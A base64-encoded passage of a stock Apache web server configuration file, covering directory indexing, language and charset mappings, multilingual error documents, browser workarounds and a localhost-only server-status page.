IGV4cGxpY2l0bHkgc2V0Lg0KIw0KRGVmYXVsdEljb24gL2ljb25zL3Vua25v
d24uZ2lmDQoNCiMNCiMgQWRkRGVzY3JpcHRpb24gYWxsb3dzIHlvdSB0byBw
bGFjZSBhIHNob3J0IGRlc2NyaXB0aW9uIGFmdGVyIGEgZmlsZSBpbg0KIyBz
ZXJ2ZXItZ2VuZXJhdGVkIGluZGV4ZXMuICBUaGVzZSBhcmUgb25seSBkaXNw
bGF5ZWQgZm9yIEZhbmN5SW5kZXhlZA0KIyBkaXJlY3Rvcmllcy4NCiMgRm9y
bWF0OiBBZGREZXNjcmlwdGlvbiAiZGVzY3JpcHRpb24iIGZpbGVuYW1lDQoj
DQojQWRkRGVzY3JpcHRpb24gIkdaSVAgY29tcHJlc3NlZCBkb2N1bWVudCIg
Lmd6DQojQWRkRGVzY3JpcHRpb24gInRhciBhcmNoaXZlIiAudGFyDQojQWRk
RGVzY3JpcHRpb24gIkdaSVAgY29tcHJlc3NlZCB0YXIgYXJjaGl2ZSIgLnRn
eg0KDQojDQojIFJlYWRtZU5hbWUgaXMgdGhlIG5hbWUgb2YgdGhlIFJFQURN
RSBmaWxlIHRoZSBzZXJ2ZXIgd2lsbCBsb29rIGZvciBieQ0KIyBkZWZhdWx0
LCBhbmQgYXBwZW5kIHRvIGRpcmVjdG9yeSBsaXN0aW5ncy4NCiMNCiMgSGVh
ZGVyTmFtZSBpcyB0aGUgbmFtZSBvZiBhIGZpbGUgd2hpY2ggc2hvdWxkIGJl
IHByZXBlbmRlZCB0bw0KIyBkaXJlY3RvcnkgaW5kZXhlcy4gDQpSZWFkbWVO
YW1lIFJFQURNRS5odG1sDQpIZWFkZXJOYW1lIEhFQURFUi5odG1sDQoNCiMN
CiMgSW5kZXhJZ25vcmUgaXMgYSBzZXQgb2YgZmlsZW5hbWVzIHdoaWNoIGRp
cmVjdG9yeSBpbmRleGluZyBzaG91bGQgaWdub3JlDQojIGFuZCBub3QgaW5j
bHVkZSBpbiB0aGUgbGlzdGluZy4gIFNoZWxsLXN0eWxlIHdpbGRjYXJkaW5n
IGlzIHBlcm1pdHRlZC4NCiMNCkluZGV4SWdub3JlIC4/PyogKn4gKiMgSEVB
REVSKiBSRUFETUUqIFJDUyBDVlMgKix2ICosdA0KDQojDQojIEFkZEVuY29k
aW5nIGFsbG93cyB5b3UgdG8gaGF2ZSBjZXJ0YWluIGJyb3dzZXJzIChNb3Nh
aWMvWCAyLjErKSB1bmNvbXByZXNzDQojIGluZm9ybWF0aW9uIG9uIHRoZSBm
bHkuIE5vdGU6IE5vdCBhbGwgYnJvd3NlcnMgc3VwcG9ydCB0aGlzLg0KIyBE
ZXNwaXRlIHRoZSBuYW1lIHNpbWlsYXJpdHksIHRoZSBmb2xsb3dpbmcgQWRk
KiBkaXJlY3RpdmVzIGhhdmUgbm90aGluZw0KIyB0byBkbyB3aXRoIHRoZSBG
YW5jeUluZGV4aW5nIGN1c3RvbWl6YXRpb24gZGlyZWN0aXZlcyBhYm92ZS4N
CiMNCkFkZEVuY29kaW5nIHgtY29tcHJlc3MgWg0KQWRkRW5jb2RpbmcgeC1n
emlwIGd6IHRneg0KDQojDQojIERlZmF1bHRMYW5ndWFnZSBhbmQgQWRkTGFu
Z3VhZ2UgYWxsb3dzIHlvdSB0byBzcGVjaWZ5IHRoZSBsYW5ndWFnZSBvZiAN
CiMgYSBkb2N1bWVudC4gWW91IGNhbiB0aGVuIHVzZSBjb250ZW50IG5lZ290
aWF0aW9uIHRvIGdpdmUgYSBicm93c2VyIGEgDQojIGZpbGUgaW4gYSBsYW5n
dWFnZSB0aGUgdXNlciBjYW4gdW5kZXJzdGFuZC4NCiMNCiMgU3BlY2lmeSBh
IGRlZmF1bHQgbGFuZ3VhZ2UuIFRoaXMgbWVhbnMgdGhhdCBhbGwgZGF0YQ0K
IyBnb2luZyBvdXQgd2l0aG91dCBhIHNwZWNpZmljIGxhbmd1YWdlIHRhZyAo
c2VlIGJlbG93KSB3aWxsIA0KIyBiZSBtYXJrZWQgd2l0aCB0aGlzIG9uZS4g
WW91IHByb2JhYmx5IGRvIE5PVCB3YW50IHRvIHNldA0KIyB0aGlzIHVubGVz
cyB5b3UgYXJlIHN1cmUgaXQgaXMgY29ycmVjdCBmb3IgYWxsIGNhc2VzLg0K
Iw0KIyAqIEl0IGlzIGdlbmVyYWxseSBiZXR0ZXIgdG8gbm90IG1hcmsgYSBw
YWdlIGFzIA0KIyAqIGJlaW5nIGEgY2VydGFpbiBsYW5ndWFnZSB0aGFuIG1h
cmtpbmcgaXQgd2l0aCB0aGUgd3JvbmcNCiMgKiBsYW5ndWFnZSENCiMNCiMg
RGVmYXVsdExhbmd1YWdlIG5sDQojDQojIE5vdGUgMTogVGhlIHN1ZmZpeCBk
b2VzIG5vdCBoYXZlIHRvIGJlIHRoZSBzYW1lIGFzIHRoZSBsYW5ndWFnZQ0K
IyBrZXl3b3JkIC0tLSB0aG9zZSB3aXRoIGRvY3VtZW50cyBpbiBQb2xpc2gg
KHdob3NlIG5ldC1zdGFuZGFyZA0KIyBsYW5ndWFnZSBjb2RlIGlzIHBsKSBt
YXkgd2lzaCB0byB1c2UgIkFkZExhbmd1YWdlIHBsIC5wbyIgdG8NCiMgYXZv
aWQgdGhlIGFtYmlndWl0eSB3aXRoIHRoZSBjb21tb24gc3VmZml4IGZvciBw
ZXJsIHNjcmlwdHMuDQojDQojIE5vdGUgMjogVGhlIGV4YW1wbGUgZW50cmll
cyBiZWxvdyBpbGx1c3RyYXRlIHRoYXQgaW4gc29tZSBjYXNlcyANCiMgdGhl
IHR3byBjaGFyYWN0ZXIgJ0xhbmd1YWdlJyBhYmJyZXZpYXRpb24gaXMgbm90
IGlkZW50aWNhbCB0byANCiMgdGhlIHR3byBjaGFyYWN0ZXIgJ0NvdW50cnkn
IGNvZGUgZm9yIGl0cyBjb3VudHJ5LA0KIyBFLmcuICdEYW5tYXJrL2RrJyB2
ZXJzdXMgJ0RhbmlzaC9kYScuDQojDQojIE5vdGUgMzogSW4gdGhlIGNhc2Ug
b2YgJ2x0eicgd2UgdmlvbGF0ZSB0aGUgUkZDIGJ5IHVzaW5nIGEgdGhyZWUg
Y2hhcg0KIyBzcGVjaWZpZXIuIFRoZXJlIGlzICd3b3JrIGluIHByb2dyZXNz
JyB0byBmaXggdGhpcyBhbmQgZ2V0DQojIHRoZSByZWZlcmVuY2UgZGF0YSBm
b3IgcmZjMTc2NiBjbGVhbmVkIHVwLg0KIw0KIyBEYW5pc2ggKGRhKSAtIER1
dGNoIChubCkgLSBFbmdsaXNoIChlbikgLSBFc3RvbmlhbiAoZXQpDQojIEZy
ZW5jaCAoZnIpIC0gR2VybWFuIChkZSkgLSBHcmVlay1Nb2Rlcm4gKGVsKQ0K
IyBJdGFsaWFuIChpdCkgLSBOb3J3ZWdpYW4gKG5vKSAtIE5vcndlZ2lhbiBO
eW5vcnNrIChubikgLSBLb3JlYW4gKGtyKSANCiMgUG9ydHVnZXNlIChwdCkg
LSBMdXhlbWJvdXJnZW9pcyogKGx0eikNCiMgU3BhbmlzaCAoZXMpIC0gU3dl
ZGlzaCAoc3YpIC0gQ2F0YWxhbiAoY2EpIC0gQ3plY2goY3opDQojIFBvbGlz
aCAocGwpIC0gQnJhemlsaWFuIFBvcnR1Z3Vlc2UgKHB0LWJyKSAtIEphcGFu
ZXNlIChqYSkNCiMgUnVzc2lhbiAocnUpIC0gQ3JvYXRpYW4gKGhyKQ0KIw0K
QWRkTGFuZ3VhZ2UgZGEgLmRrDQpBZGRMYW5ndWFnZSBubCAubmwNCkFkZExh
bmd1YWdlIGVuIC5lbg0KQWRkTGFuZ3VhZ2UgZXQgLmV0DQpBZGRMYW5ndWFn
ZSBmciAuZnINCkFkZExhbmd1YWdlIGRlIC5kZQ0KQWRkTGFuZ3VhZ2UgaGUg
LmhlDQpBZGRMYW5ndWFnZSBlbCAuZWwNCkFkZExhbmd1YWdlIGl0IC5pdA0K
QWRkTGFuZ3VhZ2UgamEgLmphDQpBZGRMYW5ndWFnZSBwbCAucG8NCkFkZExh
bmd1YWdlIGtyIC5rcg0KQWRkTGFuZ3VhZ2UgcHQgLnB0DQpBZGRMYW5ndWFn
ZSBubiAubm4NCkFkZExhbmd1YWdlIG5vIC5ubw0KQWRkTGFuZ3VhZ2UgcHQt
YnIgLnB0LWJyDQpBZGRMYW5ndWFnZSBsdHogLmx0eg0KQWRkTGFuZ3VhZ2Ug
Y2EgLmNhDQpBZGRMYW5ndWFnZSBlcyAuZXMNCkFkZExhbmd1YWdlIHN2IC5z
ZQ0KQWRkTGFuZ3VhZ2UgY3ogLmN6DQpBZGRMYW5ndWFnZSBydSAucnUNCkFk
ZExhbmd1YWdlIHR3IC50dw0KQWRkTGFuZ3VhZ2UgemgtdHcgLnR3DQpBZGRM
YW5ndWFnZSBociAuaHINCg0KIw0KIyBMYW5ndWFnZVByaW9yaXR5IGFsbG93
cyB5b3UgdG8gZ2l2ZSBwcmVjZWRlbmNlIHRvIHNvbWUgbGFuZ3VhZ2VzDQoj
IGluIGNhc2Ugb2YgYSB0aWUgZHVyaW5nIGNvbnRlbnQgbmVnb3RpYXRpb24u
DQojDQojIEp1c3QgbGlzdCB0aGUgbGFuZ3VhZ2VzIGluIGRlY3JlYXNpbmcg
b3JkZXIgb2YgcHJlZmVyZW5jZS4gV2UgaGF2ZQ0KIyBtb3JlIG9yIGxlc3Mg
YWxwaGFiZXRpemVkIHRoZW0gaGVyZS4gWW91IHByb2JhYmx5IHdhbnQgdG8g
Y2hhbmdlIHRoaXMuDQojDQpMYW5ndWFnZVByaW9yaXR5IGVuIGRhIG5sIGV0
IGZyIGRlIGVsIGl0IGphIGtyIG5vIHBsIHB0IHB0LWJyIGx0eiBjYSBlcyBz
diB0dw0KDQojDQojIEZvcmNlTGFuZ3VhZ2VQcmlvcml0eSBhbGxvd3MgeW91
IHRvIHNlcnZlIGEgcmVzdWx0IHBhZ2UgcmF0aGVyIHRoYW4NCiMgTVVMVElQ
TEUgQ0hPSUNFUyAoUHJlZmVyKSBbaW4gY2FzZSBvZiBhIHRpZV0gb3IgTk9U
IEFDQ0VQVEFCTEUgKEZhbGxiYWNrKQ0KIyBbaW4gY2FzZSBubyBhY2NlcHRl
ZCBsYW5ndWFnZXMgbWF0Y2hlZCB0aGUgYXZhaWxhYmxlIHZhcmlhbnRzXQ0K
Iw0KRm9yY2VMYW5ndWFnZVByaW9yaXR5IFByZWZlciBGYWxsYmFjaw0KDQoj
DQojIFNwZWNpZnkgYSBkZWZhdWx0IGNoYXJzZXQgZm9yIGFsbCBwYWdlcyBz
ZW50IG91dC4gVGhpcyBpcw0KIyBhbHdheXMgYSBnb29kIGlkZWEgYW5kIG9w
ZW5zIHRoZSBkb29yIGZvciBmdXR1cmUgaW50ZXJuYXRpb25hbGlzYXRpb24N
CiMgb2YgeW91ciB3ZWIgc2l0ZSwgc2hvdWxkIHlvdSBldmVyIHdhbnQgaXQu
IFNwZWNpZnlpbmcgaXQgYXMNCiMgYSBkZWZhdWx0IGRvZXMgbGl0dGxlIGhh
cm07IGFzIHRoZSBzdGFuZGFyZCBkaWN0YXRlcyB0aGF0IGEgcGFnZQ0KIyBp
cyBpbiBpc28tODg1OS0xIChsYXRpbjEpIHVubGVzcyBzcGVjaWZpZWQgb3Ro
ZXJ3aXNlIGkuZS4geW91DQojIGFyZSBtZXJlbHkgc3RhdGluZyB0aGUgb2J2
aW91cy4gVGhlcmUgYXJlIGFsc28gc29tZSBzZWN1cml0eQ0KIyByZWFzb25z
IGluIGJyb3dzZXJzLCByZWxhdGVkIHRvIGphdmFzY3JpcHQgYW5kIFVSTCBw
YXJzaW5nDQojIHdoaWNoIGVuY291cmFnZSB5b3UgdG8gYWx3YXlzIHNldCBh
IGRlZmF1bHQgY2hhciBzZXQuDQojDQpBZGREZWZhdWx0Q2hhcnNldCBJU08t
ODg1OS0xDQoNCiMNCiMgQ29tbW9ubHkgdXNlZCBmaWxlbmFtZSBleHRlbnNp
b25zIHRvIGNoYXJhY3RlciBzZXRzLiBZb3UgcHJvYmFibHkNCiMgd2FudCB0
byBhdm9pZCBjbGFzaGVzIHdpdGggdGhlIGxhbmd1YWdlIGV4dGVuc2lvbnMs
IHVubGVzcyB5b3UNCiMgYXJlIGdvb2QgYXQgY2FyZWZ1bGx5IHRlc3Rpbmcg
eW91ciBzZXR1cCBhZnRlciBlYWNoIGNoYW5nZS4NCiMgU2VlIGZ0cDovL2Z0
cC5pc2kuZWR1L2luLW5vdGVzL2lhbmEvYXNzaWdubWVudHMvY2hhcmFjdGVy
LXNldHMgZm9yDQojIHRoZSBvZmZpY2lhbCBsaXN0IG9mIGNoYXJzZXQgbmFt
ZXMgYW5kIHRoZWlyIHJlc3BlY3RpdmUgUkZDcw0KIw0KQWRkQ2hhcnNldCBJ
U08tODg1OS0xICAuaXNvODg1OS0xICAubGF0aW4xDQpBZGRDaGFyc2V0IElT
Ty04ODU5LTIgIC5pc284ODU5LTIgIC5sYXRpbjIgLmNlbg0KQWRkQ2hhcnNl
dCBJU08tODg1OS0zICAuaXNvODg1OS0zICAubGF0aW4zDQpBZGRDaGFyc2V0
IElTTy04ODU5LTQgIC5pc284ODU5LTQgIC5sYXRpbjQNCkFkZENoYXJzZXQg
SVNPLTg4NTktNSAgLmlzbzg4NTktNSAgLmxhdGluNSAuY3lyIC5pc28tcnUN
CkFkZENoYXJzZXQgSVNPLTg4NTktNiAgLmlzbzg4NTktNiAgLmxhdGluNiAu
YXJiDQpBZGRDaGFyc2V0IElTTy04ODU5LTcgIC5pc284ODU5LTcgIC5sYXRp
bjcgLmdyaw0KQWRkQ2hhcnNldCBJU08tODg1OS04ICAuaXNvODg1OS04ICAu
bGF0aW44IC5oZWINCkFkZENoYXJzZXQgSVNPLTg4NTktOSAgLmlzbzg4NTkt
OSAgLmxhdGluOSAudHJrDQpBZGRDaGFyc2V0IElTTy0yMDIyLUpQIC5pc28y
MDIyLWpwIC5qaXMNCkFkZENoYXJzZXQgSVNPLTIwMjItS1IgLmlzbzIwMjIt
a3IgLmtpcw0KQWRkQ2hhcnNldCBJU08tMjAyMi1DTiAuaXNvMjAyMi1jbiAu
Y2lzDQpBZGRDaGFyc2V0IEJpZzUgICAgICAgIC5CaWc1ICAgICAgIC5iaWc1
DQojIEZvciBydXNzaWFuLCBtb3JlIHRoYW4gb25lIGNoYXJzZXQgaXMgdXNl
ZCAoZGVwZW5kcyBvbiBjbGllbnQsIG1vc3RseSk6DQpBZGRDaGFyc2V0IFdJ
TkRPV1MtMTI1MSAuY3AtMTI1MSAgIC53aW4tMTI1MQ0KQWRkQ2hhcnNldCBD
UDg2NiAgICAgICAuY3A4NjYNCkFkZENoYXJzZXQgS09JOC1yICAgICAgLmtv
aTgtciAua29pOC1ydQ0KQWRkQ2hhcnNldCBLT0k4LXJ1ICAgICAua29pOC11
ayAudWENCkFkZENoYXJzZXQgSVNPLTEwNjQ2LVVDUy0yIC51Y3MyDQpBZGRD
aGFyc2V0IElTTy0xMDY0Ni1VQ1MtNCAudWNzNA0KQWRkQ2hhcnNldCBVVEYt
OCAgICAgICAudXRmOA0KDQojIFRoZSBzZXQgYmVsb3cgZG9lcyBub3QgbWFw
IHRvIGEgc3BlY2lmaWMgKGlzbykgc3RhbmRhcmQNCiMgYnV0IHdvcmtzIG9u
IGEgZmFpcmx5IHdpZGUgcmFuZ2Ugb2YgYnJvd3NlcnMuIE5vdGUgdGhhdA0K
IyBjYXBpdGFsaXphdGlvbiBhY3R1YWxseSBtYXR0ZXJzIChpdCBzaG91bGQg
bm90LCBidXQgaXQNCiMgZG9lcyBmb3Igc29tZSBicm93c2VycykuDQojDQoj
IFNlZSBmdHA6Ly9mdHAuaXNpLmVkdS9pbi1ub3Rlcy9pYW5hL2Fzc2lnbm1l
bnRzL2NoYXJhY3Rlci1zZXRzDQojIGZvciBhIGxpc3Qgb2Ygc29ydHMuIEJ1
dCBicm93c2VycyBzdXBwb3J0IGZldy4NCiMNCkFkZENoYXJzZXQgR0IyMzEy
ICAgICAgLmdiMjMxMiAuZ2IgDQpBZGRDaGFyc2V0IHV0Zi03ICAgICAgIC51
dGY3DQpBZGRDaGFyc2V0IHV0Zi04ICAgICAgIC51dGY4DQpBZGRDaGFyc2V0
IGJpZzUgICAgICAgIC5iaWc1IC5iNQ0KQWRkQ2hhcnNldCBFVUMtVFcgICAg
ICAuZXVjLXR3DQpBZGRDaGFyc2V0IEVVQy1KUCAgICAgIC5ldWMtanANCkFk
ZENoYXJzZXQgRVVDLUtSICAgICAgLmV1Yy1rcg0KQWRkQ2hhcnNldCBzaGlm
dF9qaXMgICAuc2ppcw0KDQojDQojIEFkZFR5cGUgYWxsb3dzIHlvdSB0byBh
ZGQgdG8gb3Igb3ZlcnJpZGUgdGhlIE1JTUUgY29uZmlndXJhdGlvbg0KIyBm
aWxlIG1pbWUudHlwZXMgZm9yIHNwZWNpZmljIGZpbGUgdHlwZXMuDQojDQpB
ZGRUeXBlIGFwcGxpY2F0aW9uL3gtdGFyIC50Z3oNCg0KIw0KIyBBZGRIYW5k
bGVyIGFsbG93cyB5b3UgdG8gbWFwIGNlcnRhaW4gZmlsZSBleHRlbnNpb25z
IHRvICJoYW5kbGVycyI6DQojIGFjdGlvbnMgdW5yZWxhdGVkIHRvIGZpbGV0
eXBlLiBUaGVzZSBjYW4gYmUgZWl0aGVyIGJ1aWx0IGludG8gdGhlIHNlcnZl
cg0KIyBvciBhZGRlZCB3aXRoIHRoZSBBY3Rpb24gZGlyZWN0aXZlIChzZWUg
YmVsb3cpDQojDQojIFRvIHVzZSBDR0kgc2NyaXB0cyBvdXRzaWRlIG9mIFNj
cmlwdEFsaWFzZWQgZGlyZWN0b3JpZXM6DQojIChZb3Ugd2lsbCBhbHNvIG5l
ZWQgdG8gYWRkICJFeGVjQ0dJIiB0byB0aGUgIk9wdGlvbnMiIGRpcmVjdGl2
ZS4pDQojDQojQWRkSGFuZGxlciBjZ2ktc2NyaXB0IC5jZ2kNCg0KIw0KIyBG
b3IgZmlsZXMgdGhhdCBpbmNsdWRlIHRoZWlyIG93biBIVFRQIGhlYWRlcnM6
DQojDQojQWRkSGFuZGxlciBzZW5kLWFzLWlzIGFzaXMNCg0KIw0KIyBGb3Ig
c2VydmVyLXBhcnNlZCBpbWFnZW1hcCBmaWxlczoNCiMNCiNBZGRIYW5kbGVy
IGltYXAtZmlsZSBtYXANCg0KIw0KIyBGb3IgdHlwZSBtYXBzIChuZWdvdGlh
dGVkIHJlc291cmNlcyk6DQojIChUaGlzIGlzIGVuYWJsZWQgYnkgZGVmYXVs
dCB0byBhbGxvdyB0aGUgQXBhY2hlICJJdCBXb3JrZWQiIHBhZ2UNCiMgIHRv
IGJlIGRpc3RyaWJ1dGVkIGluIG11bHRpcGxlIGxhbmd1YWdlcy4pDQojDQpB
ZGRIYW5kbGVyIHR5cGUtbWFwIHZhcg0KDQojIEZpbHRlcnMgYWxsb3cgeW91
IHRvIHByb2Nlc3MgY29udGVudCBiZWZvcmUgaXQgaXMgc2VudCB0byB0aGUg
Y2xpZW50Lg0KIw0KIyBUbyBwYXJzZSAuc2h0bWwgZmlsZXMgZm9yIHNlcnZl
ci1zaWRlIGluY2x1ZGVzIChTU0kpOg0KIyAoWW91IHdpbGwgYWxzbyBuZWVk
IHRvIGFkZCAiSW5jbHVkZXMiIHRvIHRoZSAiT3B0aW9ucyIgZGlyZWN0aXZl
LikNCiMNCiNBZGRPdXRwdXRGaWx0ZXIgSU5DTFVERVMgLnNodG1sDQoNCiMN
CiMgQWN0aW9uIGxldHMgeW91IGRlZmluZSBtZWRpYSB0eXBlcyB0aGF0IHdp
bGwgZXhlY3V0ZSBhIHNjcmlwdCB3aGVuZXZlcg0KIyBhIG1hdGNoaW5nIGZp
bGUgaXMgY2FsbGVkLiBUaGlzIGVsaW1pbmF0ZXMgdGhlIG5lZWQgZm9yIHJl
cGVhdGVkIFVSTA0KIyBwYXRobmFtZXMgZm9yIG9mdC11c2VkIENHSSBmaWxl
IHByb2Nlc3NvcnMuDQojIEZvcm1hdDogQWN0aW9uIG1lZGlhL3R5cGUgL2Nn
aS1zY3JpcHQvbG9jYXRpb24NCiMgRm9ybWF0OiBBY3Rpb24gaGFuZGxlci1u
YW1lIC9jZ2ktc2NyaXB0L2xvY2F0aW9uDQojDQoNCiMNCiMgQ3VzdG9taXph
YmxlIGVycm9yIHJlc3BvbnNlcyBjb21lIGluIHRocmVlIGZsYXZvcnM6DQoj
IDEpIHBsYWluIHRleHQgMikgbG9jYWwgcmVkaXJlY3RzIDMpIGV4dGVybmFs
IHJlZGlyZWN0cw0KIw0KIyBTb21lIGV4YW1wbGVzOg0KI0Vycm9yRG9jdW1l
bnQgNTAwICJUaGUgc2VydmVyIG1hZGUgYSBib28gYm9vLiINCiNFcnJvckRv
Y3VtZW50IDQwNCAvbWlzc2luZy5odG1sDQojRXJyb3JEb2N1bWVudCA0MDQg
Ii9jZ2ktYmluL21pc3NpbmdfaGFuZGxlci5wbCINCiNFcnJvckRvY3VtZW50
IDQwMiBodHRwOi8vd3d3LmV4YW1wbGUuY29tL3N1YnNjcmlwdGlvbl9pbmZv
Lmh0bWwNCiMNCg0KIw0KIyBQdXR0aW5nIHRoaXMgYWxsIHRvZ2V0aGVyLCB3
ZSBjYW4gSW50ZXJuYXRpb25hbGl6ZSBlcnJvciByZXNwb25zZXMuDQojDQoj
IFdlIHVzZSBBbGlhcyB0byByZWRpcmVjdCBhbnkgL2Vycm9yL0hUVFBfPGVy
cm9yPi5odG1sLnZhciByZXNwb25zZSB0bw0KIyBvdXIgY29sbGVjdGlvbiBv
ZiBieS1lcnJvciBtZXNzYWdlIG11bHRpLWxhbmd1YWdlIGNvbGxlY3Rpb25z
LiAgV2UgdXNlIA0KIyBpbmNsdWRlcyB0byBzdWJzdGl0dXRlIHRoZSBhcHBy
b3ByaWF0ZSB0ZXh0Lg0KIw0KIyBZb3UgY2FuIG1vZGlmeSB0aGUgbWVzc2Fn
ZXMnIGFwcGVhcmFuY2Ugd2l0aG91dCBjaGFuZ2luZyBhbnkgb2YgdGhlDQoj
IGRlZmF1bHQgSFRUUF88ZXJyb3I+Lmh0bWwudmFyIGZpbGVzIGJ5IGFkZGlu
ZyB0aGUgbGluZTsNCiMNCiMgICBBbGlhcyAvZXJyb3IvaW5jbHVkZS8gIi95
b3VyL2luY2x1ZGUvcGF0aC8iDQojDQojIHdoaWNoIGFsbG93cyB5b3UgdG8g
Y3JlYXRlIHlvdXIgb3duIHNldCBvZiBmaWxlcyBieSBzdGFydGluZyB3aXRo
IHRoZQ0KIyAvdXNyL2xvY2FsL2Vycm9yL2luY2x1ZGUvIGZpbGVzIGFuZA0K
IyBjb3B5aW5nIHRoZW0gdG8gL3lvdXIvaW5jbHVkZS9wYXRoLywgZXZlbiBv
biBhIHBlci1WaXJ0dWFsSG9zdCBiYXNpcy4NCiMNCg0KPElmTW9kdWxlIG1v
ZF9uZWdvdGlhdGlvbi5jPg0KPElmTW9kdWxlIG1vZF9pbmNsdWRlLmM+DQog
ICAgQWxpYXMgL2Vycm9yLyAiL3Vzci9sb2NhbC9lcnJvci8iDQoNCiAgICA8
RGlyZWN0b3J5ICIvdXNyL2xvY2FsL2Vycm9yIj4NCiAgICAgICAgQWxsb3dP
dmVycmlkZSBOb25lDQogICAgICAgIE9wdGlvbnMgSW5jbHVkZXNOb0V4ZWMN
CiAgICAgICAgQWRkT3V0cHV0RmlsdGVyIEluY2x1ZGVzIGh0bWwNCiAgICAg
ICAgQWRkSGFuZGxlciB0eXBlLW1hcCB2YXINCiAgICAgICAgT3JkZXIgYWxs
b3csZGVueQ0KICAgICAgICBBbGxvdyBmcm9tIGFsbA0KICAgICAgICBMYW5n
dWFnZVByaW9yaXR5IGVuIGVzIGRlIGZyDQogICAgICAgIEZvcmNlTGFuZ3Vh
Z2VQcmlvcml0eSBQcmVmZXIgRmFsbGJhY2sNCiAgICA8L0RpcmVjdG9yeT4N
Cg0KICAgIEVycm9yRG9jdW1lbnQgNDAwIC9lcnJvci9IVFRQX0JBRF9SRVFV
RVNULmh0bWwudmFyDQogICAgRXJyb3JEb2N1bWVudCA0MDEgL2Vycm9yL0hU
VFBfVU5BVVRIT1JJWkVELmh0bWwudmFyDQogICAgRXJyb3JEb2N1bWVudCA0
MDMgL2Vycm9yL0hUVFBfRk9SQklEREVOLmh0bWwudmFyDQogICAgRXJyb3JE
b2N1bWVudCA0MDQgL2Vycm9yL0hUVFBfTk9UX0ZPVU5ELmh0bWwudmFyDQog
ICAgRXJyb3JEb2N1bWVudCA0MDUgL2Vycm9yL0hUVFBfTUVUSE9EX05PVF9B
TExPV0VELmh0bWwudmFyDQogICAgRXJyb3JEb2N1bWVudCA0MDggL2Vycm9y
L0hUVFBfUkVRVUVTVF9USU1FX09VVC5odG1sLnZhcg0KICAgIEVycm9yRG9j
dW1lbnQgNDEwIC9lcnJvci9IVFRQX0dPTkUuaHRtbC52YXINCiAgICBFcnJv
ckRvY3VtZW50IDQxMSAvZXJyb3IvSFRUUF9MRU5HVEhfUkVRVUlSRUQuaHRt
bC52YXINCiAgICBFcnJvckRvY3VtZW50IDQxMiAvZXJyb3IvSFRUUF9QUkVD
T05ESVRJT05fRkFJTEVELmh0bWwudmFyDQogICAgRXJyb3JEb2N1bWVudCA0
MTMgL2Vycm9yL0hUVFBfUkVRVUVTVF9FTlRJVFlfVE9PX0xBUkdFLmh0bWwu
dmFyDQogICAgRXJyb3JEb2N1bWVudCA0MTQgL2Vycm9yL0hUVFBfUkVRVUVT
VF9VUklfVE9PX0xBUkdFLmh0bWwudmFyDQogICAgRXJyb3JEb2N1bWVudCA0
MTUgL2Vycm9yL0hUVFBfU0VSVklDRV9VTkFWQUlMQUJMRS5odG1sLnZhcg0K
ICAgIEVycm9yRG9jdW1lbnQgNTAwIC9lcnJvci9IVFRQX0lOVEVSTkFMX1NF
UlZFUl9FUlJPUi5odG1sLnZhcg0KICAgIEVycm9yRG9jdW1lbnQgNTAxIC9l
cnJvci9IVFRQX05PVF9JTVBMRU1FTlRFRC5odG1sLnZhcg0KICAgIEVycm9y
RG9jdW1lbnQgNTAyIC9lcnJvci9IVFRQX0JBRF9HQVRFV0FZLmh0bWwudmFy
DQogICAgRXJyb3JEb2N1bWVudCA1MDMgL2Vycm9yL0hUVFBfU0VSVklDRV9V
TkFWQUlMQUJMRS5odG1sLnZhcg0KICAgIEVycm9yRG9jdW1lbnQgNTA2IC9l
cnJvci9IVFRQX1ZBUklBTlRfQUxTT19WQVJJRVMuaHRtbC52YXINCg0KPC9J
Zk1vZHVsZT4NCjwvSWZNb2R1bGU+DQoNCiMNCiMgVGhlIGZvbGxvd2luZyBk
aXJlY3RpdmVzIG1vZGlmeSBub3JtYWwgSFRUUCByZXNwb25zZSBiZWhhdmlv
ciB0bw0KIyBoYW5kbGUga25vd24gcHJvYmxlbXMgd2l0aCBicm93c2VyIGlt
cGxlbWVudGF0aW9ucy4NCiMNCkJyb3dzZXJNYXRjaCAiTW96aWxsYS8yIiBu
b2tlZXBhbGl2ZQ0KQnJvd3Nlck1hdGNoICJNU0lFIDRcLjBiMjsiIG5va2Vl
cGFsaXZlIGRvd25ncmFkZS0xLjAgZm9yY2UtcmVzcG9uc2UtMS4wDQpCcm93
c2VyTWF0Y2ggIlJlYWxQbGF5ZXIgNFwuMCIgZm9yY2UtcmVzcG9uc2UtMS4w
DQpCcm93c2VyTWF0Y2ggIkphdmEvMVwuMCIgZm9yY2UtcmVzcG9uc2UtMS4w
DQpCcm93c2VyTWF0Y2ggIkpESy8xXC4wIiBmb3JjZS1yZXNwb25zZS0xLjAN
Cg0KIw0KIyBUaGUgZm9sbG93aW5nIGRpcmVjdGl2ZSBkaXNhYmxlcyByZWRp
cmVjdHMgb24gbm9uLUdFVCByZXF1ZXN0cyBmb3INCiMgYSBkaXJlY3Rvcnkg
dGhhdCBkb2VzIG5vdCBpbmNsdWRlIHRoZSB0cmFpbGluZyBzbGFzaC4gIFRo
aXMgZml4ZXMgYSANCiMgcHJvYmxlbSB3aXRoIE1pY3Jvc29mdCBXZWJGb2xk
ZXJzIHdoaWNoIGRvZXMgbm90IGFwcHJvcHJpYXRlbHkgaGFuZGxlIA0KIyBy
ZWRpcmVjdHMgZm9yIGZvbGRlcnMgd2l0aCBEQVYgbWV0aG9kcy4NCiMNCkJy
b3dzZXJNYXRjaCAiTWljcm9zb2Z0IERhdGEgQWNjZXNzIEludGVybmV0IFB1
Ymxpc2hpbmcgUHJvdmlkZXIiIHJlZGlyZWN0LWNhcmVmdWxseQ0KQnJvd3Nl
ck1hdGNoICJeV2ViRHJpdmUiIHJlZGlyZWN0LWNhcmVmdWxseQ0KDQojDQoj
IEFsbG93IHNlcnZlciBzdGF0dXMgcmVwb3J0cywgd2l0aCB0aGUgVVJMIG9m
IGh0dHA6Ly9zZXJ2ZXJuYW1lL3NlcnZlci1zdGF0dXMNCiMgQ2hhbmdlIHRo
ZSAiLnlvdXItZG9tYWluLmNvbSIgdG8gbWF0Y2ggeW91ciBkb21haW4gdG8g
ZW5hYmxlLg0KIw0KPExvY2F0aW9uIC9zZXJ2ZXItc3RhdHVzPg0KICAgIFNl
dEhhbmRsZXIgc2VydmVyLXN0YXR1cw0KICAgIE9yZGVyIGRlbnksYWxsb3cN
CiAgICBEZW55IGZyb20gYWxsDQogICAgQWxsb3cgZnJvbSAxMjcuMC4wLjEN
CjwvTG9jYXRpb24+DQoNCiMNCiMgQWxsb3cgcmVtb3RlIHNlcnZlciBjb25m
